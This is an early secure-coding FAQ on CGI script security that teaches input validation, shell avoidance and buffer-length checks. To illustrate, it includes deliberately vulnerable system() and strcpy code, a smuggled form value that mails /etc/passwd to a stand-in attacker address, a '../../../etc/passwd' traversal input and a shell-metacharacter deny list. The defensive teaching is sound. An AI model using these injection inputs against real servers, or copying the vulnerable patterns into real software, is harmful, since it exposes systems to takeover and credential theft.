Safe CGI Programming                          Last updated: 1995-09-03
----------------------------------------------------------------------

Recent exposure of security holes in several widely used CGI packages
indicates that the existing documents on CGI security have not taken
hold in the public consciousness.  These scripts are being redistributed
to people who have no programming experience and no way to determine
whether they are opening up their servers for attack.  This causes
considerable frustration for all involved.

This document is intended for the beginning or intermediate
CGI programmer.  It is by no means a comprehensive analysis of
the security risks -- its purpose is to help people avoid the
most common errors.  This document and other CGI security resources
are available at

<URL:http://www.primus.com/staff/paulp/cgi-security/>

Please send comments on this document to Paul Phillips <paulp@cerf.net>.

Q: "Why should I care? The server runs as nobody, right? That means
you can't do anything dangerous, even if you break a CGI script."

A: Wrong.  Some of the actions that can be taken in various 
circumstances are:

 1) Mailing the password file to the attacker (unless shadowed)
 2) Mailing a map of the filesystem to the attacker
 3) Mailing system information from /etc to the attacker
 4) Starting a login server on a high port and telnetting in
 5) Many denial of service attacks: massive filesystem finds,
    for example, or other resource-consuming commands
 6) Erasing and/or altering the server's log files

Another problem is that some sites are running their webservers
as root.  I CANNOT EMPHASIZE ENOUGH HOW BAD THIS IS.  You are shooting
yourself in the foot.  Whatever problem inspired you to do this, you
must solve it in some other manner, or you *will* be compromised in
the future.

There has been some confusion as to what it means to "run your 
webserver as root." It is fine to *start* the webserver as root.
This is necessary to bind to port 80 on Unix systems.  However,
the webserver should then give up its privileges with a call
to setuid.  The webserver's configuration file should allow you
to specify what user it should run as; the default is normally
"nobody", a generic unprivileged account.  Remember that it is
irrelevant which account owns the binary, and the program should 
not have the setuid bit set.
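
The privilege drop described above might look roughly like this in C.
This is only a sketch, not code from any particular server: the name
drop_privileges is made up, and a real server would take the UID and
GID from its configuration file.  The order matters, since the group
has to be changed while the process is still allowed to do so.

```c
#define _DEFAULT_SOURCE   /* exposes setgroups() on glibc */
#include <sys/types.h>
#include <grp.h>
#include <unistd.h>

/*
 * Hypothetical helper: permanently switch to an unprivileged uid/gid.
 * Returns 0 on success, -1 on failure.
 */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* Only root may replace the supplementary group list. */
    if (geteuid() == 0 && setgroups(1, &gid) != 0)
        return -1;

    /* Drop the group first: once the UID is gone we may no longer
       be allowed to change the GID. */
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;

    /* Paranoia: after dropping to a non-root UID, asking for root
       again must fail. */
    if (uid != 0 && setuid(0) == 0)
        return -1;

    return 0;
}
```

A server would call this once, after binding to port 80 and before
handling any request, and refuse to continue if it returns -1.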

There is a good argument that servers should not actually run as
"nobody", but rather as a specific UID and GID dedicated to the 
webserver, such as "www".  This prevents other programs that run
as "nobody" from interfering with server-owned files.

There is a program called "cgiwrap" <URL:http://www.umr.edu/~cgiwrap>
that runs CGI scripts under the UID of the user who owns them.  While
cgiwrap successfully overcomes some problems with CGI scripts, it also
exacerbates the effect of security holes.  If an attacker can execute
commands under the user's UID, rm -rf ~ is only a few characters long,
and the user will lose everything.


Q: "Now I'm scared, maybe my code is buggy.  Can you show me some
examples of security holes?"

A: Now you're talking.  The entire philosophy can be summed up as
"Never trust input data." Most security holes are exploited by 
sending data to the script that the author of the script did not
anticipate.  Let's look at some examples.

Foo wants people to be able to send her email via the web.  She
has several different email addresses, so she puts the address in
a hidden form element; that way she can change it later without
having to change the script.  (She needs her sysadmin's permission
to install or change CGI scripts -- what a hassle!)

<INPUT TYPE="hidden" NAME="FooAddress" VALUE="foo@bar.baz.com">

Now she writes a script called "email-foo", and cajoles the sysadmin
into installing it.  A few weeks later, Foo's sysadmin calls her back: 
crackers have broken into the machine via Foo's script! Where did 
Foo go wrong?

Let's see Foo's mistake in three different languages.  Foo has
placed the data to be emailed in a tempfile and the FooAddress 
passed by the form into a variable.  

Perl:

    system("/usr/lib/sendmail -t $foo_address < $input_file");

C: 

    sprintf(buffer, "/usr/lib/sendmail -t %s < %s", foo_address, input_file);
    system(buffer);

C++:

    // FooAddress and InputFile are std::string objects
    system(("/usr/lib/sendmail -t " + FooAddress + " < " + InputFile).c_str());

In all three cases, system() forks a shell to run the command.  Foo is
unwisely assuming that people will only call this script from *her* form,
so the email address will always be one of hers.  But the cracker copied
the form to his own machine, and edited it so it looked like this:

<INPUT TYPE="hidden" NAME="FooAddress"
VALUE="foo@bar.baz.com;mail cracker@bad.com </etc/passwd">

Then he submitted it to Foo's machine, and the rest is history,
along with the machine.
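
It can help to look at the exact string that system() hands to the
shell.  The C sketch below only builds that string and never runs it;
build_command, show_attack and the path /tmp/msg are made up for
illustration.  One detail: the value used here ends in an extra ';'.
Without it, the script's own "< file" redirection would attach to the
mail command and, being the later of two input redirections, take
precedence over "</etc/passwd".

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: build the same command line as Foo's script,
 * but only return it so it can be inspected.  Nothing is executed.
 * Returns 0 on success, -1 if the result does not fit in buf.
 */
int build_command(char *buf, size_t size,
                  const char *address, const char *input_file)
{
    int n = snprintf(buf, size, "/usr/lib/sendmail -t %s < %s",
                     address, input_file);
    return (n < 0 || (size_t)n >= size) ? -1 : 0;
}

/* Print what /bin/sh would be asked to run for a hostile form value. */
void show_attack(void)
{
    char cmd[256];
    /* The cracker's value, plus a trailing ';' (see the note above). */
    const char *evil =
        "foo@bar.baz.com;mail cracker@bad.com </etc/passwd;";

    if (build_command(cmd, sizeof cmd, evil, "/tmp/msg") == 0)
        puts(cmd);
}
```

Calling show_attack() prints

    /usr/lib/sendmail -t foo@bar.baz.com;mail cracker@bad.com </etc/passwd; < /tmp/msg

which the shell reads as three commands separated by ';': the sendmail
call Foo intended, the cracker's mail command, and a leftover
redirection that does nothing.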


Q: "I never use system.  I guess my scripts are all safe then!"

A: system() is not the only call that forks a shell.  In Perl,
you can invoke a shell by opening to a pipe, using backticks, or
calling exec (in some cases).

 * Opening to a pipe: open(OUT, "|program $args");
 * Backticks: `program $args`;
 * Exec: exec("program $args");

You can also get in trouble in Perl with the eval statement or the
regular expression modifier /e (which calls eval).  That's beyond
the scope of this document, but be careful.

In C/C++, the popen(3) call also starts a shell.

 * popen("program", "w");


Q: "What's the right way to do it?"

A: Generally there are two answers: use the data only where it can't
hurt you, or check it to make sure it is safe.  

*1* Avoid the shell.

  open(MAIL, "|/usr/lib/sendmail -t");
  print MAIL "To: $recipient\n";

Now the untrusted data is no longer being passed to the shell.  However,
it is being passed unchecked to sendmail.  In some sense you are trading
the shell problems for those of the program you are running externally,
so be sure that it cannot be tricked with the untrusted data!  For example,
if you use /usr/ucb/mail rather than /usr/lib/sendmail, tilde escapes
(input lines beginning with ~, such as ~!) can be used on some versions
to execute commands.  Be wary.

You can use the Perl system() and exec() calls without invoking a shell
by supplying more than one argument:

  system('/usr/games/fortune', '-o');

You can also use open() to achieve an effect similar to popen, but
without invoking the shell, by performing

  open(FH, '|-') || exec("program", $arg1, $arg2);
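
C has no list form of system(), but the same shell-free effect can be
had with fork() and execv().  The following is a minimal sketch under
that assumption; run_program is a made-up name, not a library call.

```c
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper: run `path` with the given argument vector and
 * wait for it to finish.  No shell is involved, so characters such
 * as ; | < > in the arguments reach the program untouched.
 * Returns the program's exit status, or -1 on failure.
 */
int run_program(const char *path, char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;                  /* fork failed */

    if (pid == 0) {
        execv(path, argv);          /* returns only on error */
        _exit(127);                 /* conventional "could not exec" */
    }

    /* Parent: wait for the child, retrying if a signal interrupts us. */
    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR)
            return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The fortune example above would become

    char *const args[] = { "fortune", "-o", NULL };
    run_program("/usr/games/fortune", args);

As with the Perl versions, this only removes the shell from the picture;
the program being run still sees the untrusted data.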

*2* Avoid insecure data.

  unless($recipient =~ /^[\w@\.\-]+$/) {
    # Print out some HTML here indicating failure
    exit(1);
  }

This time we're making sure the data is safe for passing to the
shell.  The example regexp above specifies what is safe rather than 
what is unsafe.
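
A C program can apply the same "only what is permitted" test by hand.
This sketch mirrors the regexp /^[\w@\.\-]+$/ in the default C locale;
is_safe_address is a made-up name, and the rejection of a leading '-'
is an extra precaution of this sketch (so the value cannot be mistaken
for a command-line option), not something the regexp does.

```c
#include <ctype.h>
#include <stddef.h>

/*
 * Hypothetical helper: accept only letters, digits, '_', '@', '.'
 * and '-'.  Returns 1 if the string is acceptable, 0 otherwise.
 */
int is_safe_address(const char *s)
{
    size_t i;

    if (s == NULL || s[0] == '\0')
        return 0;               /* empty input is never acceptable */
    if (s[0] == '-')
        return 0;               /* extra rule, not in the regexp */

    for (i = 0; s[i] != '\0'; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '_' || c == '@' || c == '.' || c == '-'))
            return 0;
    }
    return 1;
}
```

With this check, foo@bar.baz.com is accepted, while the cracker's value
is rejected at the first ';'.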

  if($recipient =~ tr/;<>*|`&$!#()[]{}:'"//) {
    # Print out some HTML here indicating failure
    exit(1);
  }

Or, to escape metacharacters rather than just detecting them, 
a subroutine like this could be used:

  sub esc_chars {
  # will change, for example, a!!a to a\!\!a
     my ($str) = @_;    # work on a copy of the first argument
     $str =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
     return $str;
  }

These regexps specify what is unsafe.  I believe them to cover the most
dangerous metacharacters, but I have no authoritative source to check,
and the list is not complete: backslash, newline, ? and ~ are also
special to the shell.  The difference between the latter two regexps and
the first is the difference between the two security policies "that
which is not expressly permitted is forbidden" and "that which is not
expressly forbidden is permitted." Security professionals will tell you
that the former policy is safer.
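
For C programmers, the escaping subroutine could be sketched as follows.
It uses the same character list as the Perl examples and is subject to
the same doubts about completeness; the names are made up for
illustration.  Note that a backslash only protects a character outside
quotes: inside single quotes the shell treats the backslash literally.

```c
#include <stdlib.h>
#include <string.h>

/* Same character list as the Perl examples above. */
static const char UNSAFE[] = ";<>*|`&$!#()[]{}:'\"";

/*
 * Hypothetical helper: return a newly allocated copy of `in` with a
 * backslash placed before every listed character, or NULL if memory
 * runs out.  The caller must free() the result.
 */
char *esc_chars(const char *in)
{
    /* Worst case: every character gets a backslash in front of it. */
    char *out = malloc(2 * strlen(in) + 1);
    char *p = out;

    if (out == NULL)
        return NULL;

    for (; *in != '\0'; in++) {
        if (strchr(UNSAFE, *in) != NULL)
            *p++ = '\\';
        *p++ = *in;
    }
    *p = '\0';
    return out;
}
```

Given a!!a, esc_chars() returns a\!\!a, as in the Perl version.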

For maximum security, use both *1* and *2* where possible.

USE PERL TAINT CHECKS: Perl can be very helpful with these problems.
Invoke it with perl -T to force taint checks; to learn about taint
checks, see the perlsec man page.  (The -T option exists only under Perl5.)


Q: "Can I trust user supplied data if there is no shell involved?"

A: No.  There are other issues as well.  Consider this Perl code fragment:

  open(MANPAGE, "/usr/man/man1/$filename.1");

This is intended to allow HTML access to man pages.  However, consider
what happens if the user-supplied filename is:

  ../../../etc/passwd

Any time you are dealing with pathnames, be sure to check for
the .. component.
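
In C, such a check might look like the sketch below.  Both function
names are made up.  The first looks for a ".." component anywhere in a
path; the second is a stricter test that fits the man page example,
where the user should only ever supply a bare name.

```c
#include <string.h>

/* Returns 1 if any '/'-separated component of path is exactly "..". */
int has_dotdot(const char *path)
{
    const char *p = path;

    while (*p != '\0') {
        size_t n = strcspn(p, "/");     /* length of this component */

        if (n == 2 && p[0] == '.' && p[1] == '.')
            return 1;
        p += n;
        if (*p == '/')
            p++;                        /* step over the separator */
    }
    return 0;
}

/*
 * Hypothetical stricter check: a non-empty name with no '/' in it
 * that is neither "." nor "..".  Returns 1 if acceptable.
 */
int is_plain_name(const char *name)
{
    if (name[0] == '\0' || strchr(name, '/') != NULL)
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    return 1;
}
```

Here has_dotdot("../../../etc/passwd") returns 1, while a name such as
"a..b" is left alone because the dots are not a whole component.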


Q: "What else?"

A: In C and C++, fixed-size buffers are vulnerable to buffer overruns
when input is copied into them without a length check.  Perl dynamically
extends its data structures to prevent this.  Imagine code like this:

int foo() {
    char buffer[10];

    strcpy(buffer, get_form_var("feh"));
    /* etc */
}

When writing this code, the author certainly expected the value of
the feh variable to be fewer than 10 characters.  Unfortunately for
him, he didn't make sure, and it turned out to be much longer.  This
means that user data overwrites the program stack, which in some
circumstances can be used to invoke commands.

This is very difficult to exploit and you probably will not encounter 
it.  Still, it's worth mentioning; a very similar hole was found in
NCSA httpd 1.3 earlier in 1995.  It is poor programming practice not to
check such things anyway.
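
One way to "make sure" is to check the length before copying.  The
following is a sketch only; copy_checked is a made-up name, and whether
an over-long value should be rejected (as here) or truncated is a
decision for the script's author.

```c
#include <string.h>

/*
 * Hypothetical helper: copy src into dst only if it fits, including
 * the terminating '\0'.  Returns 0 on success, -1 if src is too long
 * (dst is then left as an empty string).
 */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst_size == 0)
        return -1;              /* no room even for the terminator */

    len = strlen(src);
    if (len >= dst_size) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);  /* +1 copies the terminator as well */
    return 0;
}
```

In the example above, the strcpy line would become

    if (copy_checked(buffer, sizeof buffer, get_form_var("feh")) != 0) {
        /* report the error and stop */
    }

assuming get_form_var never returns a null pointer.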

Along the same lines, under no circumstances should the C gets() 
function be used.  It's inherently insecure, as there is no way 
to specify how large the input buffer is.  Use fgets() on the stdin
stream instead.
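
A small wrapper around fgets() might look like this.  It is a sketch;
read_line is a made-up name, and the stream is passed in as a parameter
so the same code works for stdin or any other FILE.

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: read one line from fp into buf, storing at
 * most size - 1 characters, and strip the trailing newline.
 * Returns  1 if a complete line was read,
 *          0 if no newline was seen (the line did not fit, or the
 *            input ended without one),
 *         -1 on end of file or error.
 */
int read_line(FILE *fp, char *buf, int size)
{
    size_t len;

    if (size <= 0 || fgets(buf, size, fp) == NULL)
        return -1;

    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 1;
    }
    return 0;
}
```

A CGI program would call it as read_line(stdin, buf, sizeof buf) and
treat a return value of 0 as a sign that the input was longer than
expected.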

Q: "My WWW server doesn't run on a Unix platform.  Only Unix has all
these nasty security holes."

A: This may or may not be true.  The author of this document has limited
experience with servers on other platforms, but he is more than a little
skeptical that security concerns do not exist.  At the very least, the
gets() and stack-overflow issues are present on Windows and MacOS as well.
Specific examples of other CGI dangers on other platforms are welcomed.

*Appendix*

Contributions to this document welcomed at <paulp@cerf.net>.

Thanks to those who have contributed to this document:

John Halperin <JXH@SLAC.Stanford.EDU>
Maurice L. Marvin <maurice@cs.pdx.edu>
Dave Andersen <dga - at - pobox dot com>
Zygo Blaxell <zblaxell@ezmail.com>
Joe Sparrow <JSPARROW@UVVM.UVIC.CA>